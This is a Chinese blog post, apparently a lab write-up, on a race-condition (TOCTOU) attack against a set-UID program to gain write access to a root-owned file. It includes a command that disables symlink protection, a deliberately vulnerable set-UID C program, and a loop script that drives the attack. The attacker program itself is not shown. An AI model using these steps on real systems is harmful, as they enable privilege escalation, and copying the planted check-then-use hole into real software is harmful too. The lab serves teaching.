普通用户也可编辑passwd和shadow

最新推荐文章于 2023-10-24 11:54:11 发布
最新推荐文章于 2023-10-24 11:54:11 发布
阅读量323 收藏
点赞数
分类专栏: web安全 Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44902875/article/details/104793521
版权

前言:我把梦写一写
0x00_实验准备
虚拟机:Ubuntu 4.15.0
先取消竞态条件攻击的保护,及创建工作目录seed

echo 0 > /proc/sys/fs/protected_symlinks
mkdir seed

在这里插入图片描述
在 /home/hack/seed 下新建 vulp.c 文件:
在这里插入图片描述

/* vulp.c */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define DELAY 10000

int main()
{
    char * fn = "/tmp/XYZ";
    char buffer[60];
    FILE *fp;
    long int i;
    /* get user input */
    scanf("%50s", buffer );
    if(!access(fn, W_OK)){
        for(i=0; i < DELAY; i++){
            int a = i^2;
        }
        fp = fopen(fn, "a+");
        fwrite("\n", sizeof(char), 1, fp);
        fwrite(buffer, sizeof(char), strlen(buffer), fp);
        fclose(fp);
    }
    else printf("No permission \n");
}

安装gcc

 sudo apt install build-essential

创造漏洞文件及设置权限,将其设为SET-UID文件

sudo gcc vulp.c -o vulp
sudo chmod u+s vulp

在这里插入图片描述
创建目标文件,用root用户创建root_file

sudo touch root_file 
sudo chmod g+w root_file
vim append_text

在这里插入图片描述
这样所有攻击环境就准备好嘞
在这里插入图片描述
创建检查时间戳的脚本check.sh,并将运行vulp的命令加入其中

#!/bin/sh
#注意`不是单引号
old=`ls -l /home/shiyanlou/seed/root_file`
new=`ls -l /home/shiyanlou/seed/root_file`
while [ "$old" = "$new" ]
do
    ./vulp < append_text
    new=`ls -l /home/shiyanlou/seed/root_file`
done
echo "STOP... The file has been changed"

vim check.sh
chmod u+x check.sh

在这里插入图片描述

vim attacker.c
gcc attacker.c -o attacker

在这里插入图片描述
总目录
在这里插入图片描述
先运行

./attacker

在这里插入图片描述

./check.sh

在这里插入图片描述
可以访问也可以编辑
在这里插入图片描述
搞定
在这里插入图片描述

佛性死磕
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux下/etc/passwd文件的选项说明
09-16
`/etc/passwd`文件的每一行代表一个用户账户,而这个文件本身是可读的,但为了安全,敏感信息如口令通常不会直接写入。因此,理解这个文件的结构和内容对于Linux系统管理员来说至关重要,因为它直接影响到用户权限的...
通过修改配置文件/etc/passwd,shadow添加新的用户
csdn_3389的博客
10-28 5122
通过修改配置文件的方法新建新的用户有两点好处: 1,更好的理解用户和组,以及每个配置文件的内容和作用。 2,批量快速的创建新用户。 步骤:新建的用户和组名是liwu,UID:507,GID:505     //用户名、组名、UID和GID不可其他用户冲突 1,修改/etc/passwd [root@as5 home]#echo "liwu:x:507:505::/home/liwu:/b
llinux 写/etc/passwd文件添加用户
qq_41631806的博客
04-07 4457
llinux 写/etc/passwd文件添加用户(openssl passd加密) 前言 在做vulnhub靶机——AI-web-1 .0的时候,getshell用户具有/etc/passwd写权限,/etc/shadow无读写权限。傻子将/etc/passwd密码直接以明文写进去,不能登录。 前提操作用户对文件/etc/passwd有写权限。 一、简单介绍/etc/passwd文件格式: 详细...
Linux下的用户、组和权限
weixin_45116657的博客
09-24 625
目录: 一:用户和组信息的查看 查看用户信息; 查看密码信息; 查看组信息; 特殊组wheel; 二:用户和组信息管理 用户管理; 组管理; 三:文件权限 文件权限的查看; 问价权限的修改; ACL控制权限setfacl、getfacl、Umask、Suid、Sgid、粘滞位; 四:Linux中sudo、sudo -i、su、su -命令 相关文章:linux用户方面的加固!!! 前...
linux中通过修改/etc/passwd,/etc/shadow,/etc/group创建用户
weixin_33868027的博客
10-23 918
目的:以root用户通过修改用户配置文件来为系统增加test1用户登陆root用户,创建test1用户密码为redhatvim /etc/passwd增加test1用户的信息注释:passwd中每个字段含义以冒号隔开 1.用户名 2.密码,隐藏的所以用x表示 3.用户id,大于500,一般500以内的为系统用户使用 4.用户组id 5.用户注释可...
【进行用户用户组操作】
m0_73693938的博客
10-06 734
n回答:创建mike用户时,设置了用户id - 1010,然后创建alice时,没有设置用户id,那就自动编号1011,最后创建smith时,也没有设置用户id,那也是自动编号1012。每个用户都有一个用户组,系统可以对一个用户组中的所有用户进行集中管理。增加用户账号就是在/etc/passwd文件中为新用户增加一条记录,同时更新其他系统文件/etc/shadow,/etc/group等。创建用户mike,主目录为/home/mike,用户id为1010,密码为12345,注释my workmate。
计算机用户和组管理PPT学习教案.pptx
10-03
- **pwck**:检查/etc/passwd和/etc/shadow文件的格式和值是否正确。 - **grpck**:检查/etc/group和/etc/gshadow文件的格式和值是否正确。 8. **命令行工具管理账户**: - **useradd**:添加用户,可以指定主组...
Linux用户管理.pdf
09-13
9. **密码管理和用户锁定**:`passwd` 修改用户密码,`usermod -L` 锁定用户,`usermod -U` 解锁用户。 10. **更改用户主目录**:`usermod -d` 更改用户主目录,`-m` 选项移动原有内容,如 `usermod -d /home/user...
linuxLinux用户用户组管理学习教案.ppt
01-05
在Linux操作系统中,用户用户组的管理是系统管理的核心部分。这涉及到权限分配、安全控制以及资源的共享。以下是一些关于Linux用户用户组管理的关键知识点: 1. **用户用户账户**:在Linux中,每个使用系统的...
yocto系列讲解[技巧篇]67 - 在etc中passwd shadow和group文件中添加用户和组等信息
fulinux的博客
11-19 1661
在etc中passwd shadow和group文件中添加用户和组等信息
linux用户配置文件passwd和密码配置文件shadow,用户管理,组管理
weixin_34037515的博客
08-15 283
一、linux和windows互传文件1.安装支持包:lrzszyum-yinstalllrzszputty工具 不支持lrzsz2.rz windows文件fail2ban-0.8.14.tar.gz 到linux 当前目录3.szbaidu.png 传输文件从linux 到 windows二、 用户配置文件和密码配置文件1.用户配置文件ls /etc/pass...
账号和权限管理
A1100886的博客
04-01 237
最详细的资料,你值得拥有!
9.3.4 直接编辑passwdshadow文件
Linux/UNIX典藏大系
12-18 854
9.3.4  直接编辑passwdshadow文件在Linux中所作的一切基本配置最终都将反映到配置文件中,用户管理也不例外。所有的用户信息都登记在/etc/passwd文件中,而/etc/shadow文件则保存着用户的登录密码。诸如useradd这样的工具实际上对用户隐藏了用户管理的细节。可以通过手动编辑passwdshadow这两个文件实现useradd等工具的所有功能。其中,pa
【转载】zabbix监控常见系统报错
BLOCKGOLD.E的博客
11-28 1676
https://www.cnblogs.com/st666/p/9884889.html
权限管理-文件特殊权限-SetUID
一个懒鬼的博客
01-29 926
1.setUID作用普通用户在执行拥有SetUID程序的时候,暂时的会获得这个程序的所有者的身份2.设定SetUID权限、取消SetUID权限的方法3.Setuid是一个不安全的命令,除了系统拥有这些默认的SetUID权限,尽量不用给程序或者命令赋予SetUID权限,还要定期扫描,保证系统当中,除了默认SetUID之外,不会产生过多的SetUID权限。
Linux命令之passwd命令
热门推荐
月生的静心苑
01-10 2万+
passwd实用程序用于更新用户的身份验证令牌。这个任务是通过调用LinuxPAM和Libuser API来实现的。本质上,它将自己初始化为使用Linux PAM的“passwd”服务,并利用配置的密码模块进行身份验证,然后更新用户的密码。passwd命令用于设置用户的认证信息,包括用户密码、密码过期时间等。系统管理者则能用它管理系统用户的密码。只有管理者可以指定用户名称,一般用户只能变更自己的密码。一般情况下我们使用passwd命令修改密码需要确认密码,如何批量修改账户密码呢???
Linux教程——Linux /etc/shadow(影子文件)内容解析(超详细)
Itmastergo的博客
07-03 3154
/etc/shadow 文件,用于存储 Linux 系统中用户的密码信息,又称为“影子文件”。前面介绍了 /etc/passwd 文件,由于该文件允许所有用户读取,易导致用户密码泄露,因此 Linux 系统将用户的密码信息从 /etc/passwd 文件中分离出来,并单独放到了此文件中。
/etc/shadow 文件
最新发布
qazplmzyy的博客
10-24 1239
用户名:加密后的用户密码:用户最近一次口令被修改的天数:最短口令存活期:密码有效期:密码过期前几天提醒用户:过期后几天账户被禁用:被禁用具体日期:保留字段(用于功能扩展)使用root用户登录后,修改(使用vim编辑器)普通用户的UID为0,使其拥有超级用户的权限,此操作后,该普通用户可以访问有权限要求的文件。账户被禁用后,系统不允许此用户登录,也不会提示过期,是完全禁用。如果设置为0,禁用此功能,也就是可以随时修改密码。如果有密码,则会显示密码的哈希值(被加密)【UID为0时,被判定为超级用户
passwdshadow
07-25
普通用户可以使用passwd命令来修改自己的密码,因为passwd命令具有SUID权限,即以root权限执行该命令,从而可以修改/etc/shadow文件中的密码。\[2\]\[3\] 需要注意的是,passwd命令和usermod命令都可以用来锁定和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值